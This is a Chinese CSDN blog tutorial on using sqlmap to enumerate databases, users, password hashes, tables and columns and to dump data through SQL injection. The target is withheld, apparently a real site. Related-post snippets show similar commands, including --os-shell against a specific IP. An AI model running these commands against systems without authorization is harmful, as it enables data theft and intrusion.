Sqlmap爆库命令的简单使用

最新推荐文章于 2024-03-10 22:38:19 发布
最新推荐文章于 2024-03-10 22:38:19 发布
阅读量6.4k 收藏 14
点赞数 4
分类专栏: 渗透工具 文章标签: Web安全 Sqlmap命令的简单使用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41617034/article/details/89502428
版权

测试地址:因为涉及商业隐私,这里就不列啦

我这里用的是windows,并没有用kali,所以需要使用sqlmap.py

1.Sqlmap.py -u "网址"   网址存在注入点

在这里插入图片描述
可以看出有三个注入点,底下还有其他系统或数据库信息

2.曝出数据库名称
--dbs

在这里插入图片描述
可以看出有三个数据库

3.查看web当前使用的数据库
--current -db

在这里插入图片描述

4.曝出web数据库使用账户
    --current -user

在这里插入图片描述

  5.列出数据库所有账户
    --users

没截…

  6.曝出数据库账号和密码
    --passwords

没截…

7.列出数据库中的表
-D XX --tables
(-D:指定数据库名称
XX:数据库名称
--tables:列出该数据库的表)

在这里插入图片描述

8.列出表中的字段
-D XX -T YY --columns
(-D指数据库名称
XX指数据库
-T指要列出字段的表
YY指数据库中的表
--columns指字段)

在这里插入图片描述

9.曝字段内容
-D XX -T YY -C ”a,b,c” --dump
(-D指数据库名称
XX指数据库
-T指要列出字段的表
YY指数据库中的表
-C指定要曝的字段
--dump将结果导出)

在这里插入图片描述

1stPeak
关注
  • 4
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqlmap命令大全
02-22
什么是SQLmapSQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令
SQL注入库渗透测试(初学者必看)
yi152787的博客
04-30 1867
库原理基本一致的,也许站点不同但只要存在sql注入则需要进行数据库破,步骤及使用的参数基本相同,对参数不够熟悉的网友可以去某百某博查看相关信息,本次实验结束,本文章仅提供参考,请勿在未授权的情况下进行测试。本次实验利用sqlmap破工具对SQL靶场进行渗透测试(数据库破),最终目标:拿到用户名和密码,实验中页面出现的用户名密码可忽略,真实实战中一般不会直接出用户名和密码的。5.在security出users,已确定目标所在,进行第三步破 所使用到的参数 -D -T --colimn;
如何使用sqlmap库和挂马
Leslieyzz的博客
01-19 2326
如何使用sqlmap库和挂马的技术博客
靶场:sql-less-18——sqlmap库的操作
最新发布
2301_79757379的博客
03-10 513
靶场:sql-less-18——sqlmap库的操作
mysql注入在可报错时出数据库名与字段名
qq_61955196的博客
04-21 415
mysql中报错出数据库名、表名
破dvwa数据库
m0_65150886的博客
08-28 148
sqlmap.py -r bc.txt --dbs 查询所有的数据库。
简明SQLmap暴库
回忆式~过去.的博客
04-01 1万+
1、首先在网站找到 可能有sql注入的 url链接,图中凭感觉怀疑 id 参数有注入的可能 2、上sql map,检测这个url 3、稍等片刻后 扫描结果如图中,说明有注入,不做过多详细说明 4、既然有注入,直接 --dbs 破出 数据库名称 5、稍等片刻,sqlmap 告诉我们 找到三个数据库 6、maoshe 这个数据库应该是 该网站的数据库,直接 指定数据库 库 -D “maoshe” --dump-all 7、数据库中的表数据都被保存下来了 拿到admin 账号密码 就可以
SQLmap常用命令
05-08
sqlmap是一个自动化的sql注入渗透工具,指纹检测、注入方式、注入成功后的取数据等等都是自动化的,甚至还提供了一个字典来将取回来的hash破,当然对于真实环境中这破功能战斗力基本为0....
SQLMAP使用笔记.pdf
01-25
SQLMAP使用笔记
SQLMAP神器使用.pdf
01-05
sqlmap常见的命令使用以及实验步骤和方法
SQL注入技巧-盲注暴库详细技巧及实例
10-11
个人通过拜读各位前辈们的博文以及大量的ctf题目训练,结合挖洞经验整理的几点sql常用的盲注技巧,结合具体的sql指令加深理解,针对常用的防护技术,总结了几种通用的绕过技巧
Sqlmap使用手册中文版
01-13
Sqlmap使用手册中文版 Sqlmap是十分著名的、自动化的SQL注入工具。 sqlmap简介 sqlmap支持五种不同的注入模式: 基于布尔的盲注 基于时间的盲注 基于报错注入 联合查询注入 堆叠注入 Sqlmap是开源的自动化SQL注入...
Sqlmap 随记
orchid_sea的博客
04-27 737
sqlmap安装 linux环境下键入命令 apt install sqlmap 老师说,如果遇到如图问题,把文件删掉重新安装就好了;但是呢,按照这个方式我没有解决掉。 那就重新安装sqlmap和依赖库吧: 按照提示,先更新一下apt工具 apt-get update 工具更新完再安装sqlmap 安装完就能成功进入sqlmapsqlmap GET注入 sqlmap -u "http://192.168.181.1/pikachu-master/vul/sqli/sqli_str.php?name=a
Sqlmap常见命令速记
weixin_45983489的博客
06-07 978
sqlmap的常见命令
sqlmap入门-库,表,列,字段
weixin_46626737的博客
11-14 6865
①当判断a为get注入点后(get) 可使用python sqlmap.py -u "url?a=1" --dbs数据库 假设结果中有member数据库 ②表 python sqlmap.py -u "url?a=1" --tables -D member 假设有表student ③列 python sqlmap.py -u "url?a=1" --column -T student -D member 假设有列id,password,stasus等列 ④字段 python sq
Sqlmap入门库、表、字段、记录
weixin_56306210的博客
10-31 2001
Sqlmap库、表、字段、记录
使用sqlmap简单暴库拿flag教程案例
酒醉浮生的博客
11-12 1万+
题目链接: http://ctf.xjnu.edu.cn:9900/web10/ 使用工具:sqlmap 首先打开网址,会看到一个以黑色为主题的网页,并且有一张黑客经典头像图片,里面全是英文 虽然我英语一直不好,可是勉强还是能看懂他的意思,如果你真的一点也看不懂,别怕啊,科技的力量改变一切,现在大多浏览器几乎都支持网页翻译,以谷歌浏览器为例,当你打开这个网页就会自动提示是否翻译为汉语 ,...
sqlmap实例拿站
热门推荐
天元喜羊羊的博客
08-03 2万+
http://www.myhack58.com/Article/html/3/8/2012/35324.htm 目标: http://www.djj.com/yz/cn/videodt.jsp?Videoid=10 此URL为sa权限猪肉一块 用穿山甲不能执行命令 过程如下: 通过访问 http://www.djj .com/login.jsp 得知该站由一
sqlmap一次实践暴库
Action
06-23 925
http://waning411.blog.51cto.com/4909368/1398926
sqlmap库命令
09-07
使用sqlmap进行数据库破的命令有多种。以下是一些常用的sqlmap命令示例: - 要获取当前数据库名称的命令是: sqlmap -u "http://43.138.211.45/news.php?cid=1" --current-db。 - 要获取操作系统级别的shell访问的命令是: sqlmap -u "http://43.138.211.45/news.php?cid=1" --os-shell。 - 要获取指定表的列信息的命令是: sqlmap -u "http://43.138.211.45/news.php?cid=1" -T 510_admin --columns。 - 要获取指定数据库中的表信息的命令是: sqlmap -u "http://43.138.211.45/news.php?cid=1" -D 510cms --tables。 请注意,这些命令仅供参考,并且在实际使用时可能需要根据目标数据库的不同进行调整。在使用sqlmap进行数据库破时,请确保遵守法律法规,并获得合法授权。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1stPeak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值